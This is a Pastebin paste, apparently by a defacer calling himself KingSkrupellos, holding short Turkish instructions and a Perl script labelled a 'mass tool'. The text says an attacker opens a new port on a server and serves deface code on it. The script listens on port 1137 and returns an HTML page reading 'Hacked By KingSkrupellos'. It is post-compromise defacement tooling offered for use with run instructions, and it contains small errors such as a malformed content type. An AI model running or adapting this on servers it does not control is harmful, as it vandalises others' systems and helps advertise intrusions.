Advertisement
KingSkrupellos

Famous Server Port Mass Tool

Nov 25th, 2017
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.86 KB | None | 0 0
  1. Port Açığını Mantığı =>
  2.  
  3. Hacker Sunucuda yeni bir port açar ve açtığı porta index kodlarını atar.
  4. ActivePerl kodlarını mass.pl diye kaydedin ve Command Prompt ekranında perl mass.pl diye çalıştırın. O Kadar.
  5.  
  6. #!/usr/bin/perl -w
  7. use strict;
  8. use IO::Socket;
  9.  
  10. sub Wait {
  11. wait;
  12. }
  13.  
  14. $SIG{CHLD} = \&Wait;
  15.  
  16. my $server = IO::Socket::INET->new(
  17. LocalPort => 1137,
  18. Type => SOCK_STREAM,
  19. Reuse => 1,
  20. Listen => 10) or die "$@\n";
  21. my $client ;
  22.  
  23. while($client = $server->accept()) {
  24. select $client;
  25. print $client "HTTP/1.0 200 OK\r\n";
  26. print $client "Content-type: text/p\r\n\r\n";
  27. print $client '<html>
  28. <center>
  29. <h1>Hacked By KingSkrupellos</h1>
  30. </center>
  31. </html>';
  32. }
  33. continue {
  34. close($client);
  35. kill CHLD -> -$$;
  36. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement